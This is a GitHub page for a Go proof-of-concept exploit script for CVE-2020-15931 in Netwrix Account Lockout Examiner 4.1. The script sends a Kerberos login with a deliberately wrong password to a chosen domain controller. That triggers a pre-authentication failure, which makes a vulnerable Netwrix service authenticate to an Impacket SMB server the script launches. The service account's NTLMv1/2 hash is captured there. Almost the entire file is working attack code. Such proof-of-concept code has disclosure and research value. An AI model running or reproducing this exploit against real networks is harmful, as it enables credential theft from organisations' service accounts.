-
Notifications
You must be signed in to change notification settings - Fork 6
/
cve-2020-15931.go
156 lines (129 loc) · 4.08 KB
/
cve-2020-15931.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
// Version : 1.0
// Created date : 08/13/2020
// Last update : 08/13/2020
// Authors : Daniel Min (@bigb0ss) & Robert Surace (@robSauce)
// Description : Proof-of-Concept Exploit Script for CVE-2020-15931
package main
import (
"flag"
"fmt"
"os"
"strings"
"log"
"os/exec"
"github.com/fatih/color"
kclient "github.com/ropnop/gokrb5/client"
kconfig "github.com/ropnop/gokrb5/config"
)
type Authenticator interface {
Login() (string, string, error)
}
const (
usage = `
Required:
-d Domain name
-dc Domain controller
-u Valid username
Optional:
-h Print this help menu
Example:
./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith
`
KERB_FMT_STRING = `[libdefaults]
default_realm = ${REALM}
dns_lookup_realm = false
dns_lookup_kdc = true
[realms]
%s = {
kdc = %s
}`
)
type FlagOptions struct {
help bool
username string
domain string
password string
dc string
}
func banner() {
banner := `
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
`
color.White(banner)
}
func options() *FlagOptions {
username := flag.String("u","","Username")
domain := flag.String("d","","Domain Name")
dc := flag.String("dc","","Domain controller")
help := flag.Bool("h", false, "Help Menu")
flag.Parse()
return &FlagOptions{help: *help, username: *username, domain: *domain, dc: *dc}
}
func kerbAuth(username string, domain string, domainController string) string {
var dom = domain
var user = username
var pass = "wrongPass" // Wrong Password
var dc = domainController
var payload string = "[+] DC: \t" + dc + "\n"
payload+= "[+] Domain: \t" + dom + "\n"
payload+= "[+] Username: \t" + user + "\n"
payload+= "[+] Password: \t" + pass + "\n"
// Formats the config per the RFC standard
kcfg_str := fmt.Sprintf(KERB_FMT_STRING, dom, dc)
cfg, err := kconfig.NewConfigFromString(kcfg_str)
cl := kclient.NewClientWithPassword(user, dom, pass, cfg, kclient.DisablePAFXFAST(true))
err = cl.Login()
if err != nil {
if strings.Contains(err.Error(), "Networking_Error: AS Exchange Error") {
color.Red("[-] Can't connect to DC\n")
os.Exit(1)
} else if strings.Contains(err.Error(), "KRB_AP_ERR_SKEW") {
color.Red("[-] Cannot connect to DC\n")
os.Exit(1)
} else if strings.Contains(err.Error(), "KDC_ERR_C_PRINCIPAL_UNKNOWN") {
color.Green(payload)
color.Yellow("[-] User is NOT valid!\n")
os.Exit(1)
} else if strings.Contains(err.Error(), "KDC_ERR_CLIENT_REVOKED") {
color.Green(payload)
color.Yellow("[-] User is locked!\n")
os.Exit(1)
} else if strings.Contains(err.Error(), "KDC_ERR_PREAUTH_FAILED") {
payload+= "[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!\n"
color.Green(payload)
color.Cyan("[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.\n")
} else {
fmt.Println(payload)
}
}
return payload
}
func smb() {
smbServer := exec.Command("smbserver.py","test","/tmp","-smb2support")
smbServer.Stdout = os.Stdout
smbServer.Stderr = os.Stderr
log.Println(smbServer.Run())
}
func main (){
banner()
opt := options()
if opt.help{
fmt.Println(usage)
os.Exit(0)
}
if opt.username == "" || opt.domain == "" || opt.dc == "" {
fmt.Println(usage)
os.Exit(0)
}
kerbAuth(opt.username, opt.domain, opt.dc)
// SMB Server (Impacket smbserver.py)
fmt.Println("[+] SMB Server Started...")
smb()
}